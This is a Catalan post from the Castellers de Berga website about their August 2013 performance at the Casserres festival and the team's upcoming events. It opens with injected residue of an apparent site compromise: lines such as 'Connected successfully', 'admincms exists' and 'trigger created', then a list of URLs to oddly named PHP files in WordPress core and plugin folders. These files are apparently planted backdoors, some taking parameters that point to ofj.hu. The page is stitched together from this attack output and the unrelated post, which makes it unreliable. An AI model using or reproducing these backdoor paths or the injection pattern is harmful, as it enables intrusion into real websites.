Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?core https://castellersdeberga.cat/wp-admin/includes/class-wp-post-comments-list-table-cron-stream-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/admin-post-wp-wp-cron.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user-new-stream-meta-cron-meta-ajax-core.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/index-wp-cron-stream-stream-meta.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-private-cron-private-private-ajax-response-wp-core-ajax-response-wp.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-base64-wp-meta-meta-ajax-response-meta.php https://castellersdeberga.cat/wp-includes/deprecated-cron-cron-wp-meta-ajax-response-ajax-response.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Festa Major de Casserres
 

Festa Major de Casserres


Festa Major de CasserresCom ja va passar el 2012, divendres 23 d’agost de 2013 vam actuar a la Festa Major de Casserres, just després del pregó d’inici. Va ser en solitari, a la Plaça Santa Maria.
Vam començar l’actuació amb un pilar de 4. A continuació, 4 de 6 amb l’agulla i 5 de 6. A tercera ronda, vam apostar pel 4 de 7, el primer després de vacances. Vam desmuntar el primer intent per males mides dels pisos de segons i terços. Al segon intent, vam descarregar el nostre 7è 4 de 7. Vam tancar l’actuació amb dos pilars de 4.
Agraïm molt sincerament als casserrencs que van fer pinya amb nosaltres. No hauria estat el mateix sense la seva ajuda.
Castellers de Berga torna a actuar el dissabte 31 d’agost, a la Festa Major d’Artés, amb Salats de Súria i Carallots de Sant Vicenç dels Horts. Però durant la setmana hi ha altres activitats. Dimarts 27 a la tarda, qui ensenyi el mocador de Castellers de Berga a la piscina d’Avià, entrarà pagant només 0,5 €. El mateix dimarts 27, assaig a la fresca a la Plaça del Padró d’Avià, a les 8 del vespre. Dissabte 31, a 2/4 de 5 de la tarda, pilar davant Avinguda 44, d’Avià, establiment premiat del sorteig d’un pilar entre el llistat Aquí fem pinya 2013. I diumenge 1 de setembre, excursió al Cim d’Estela.

1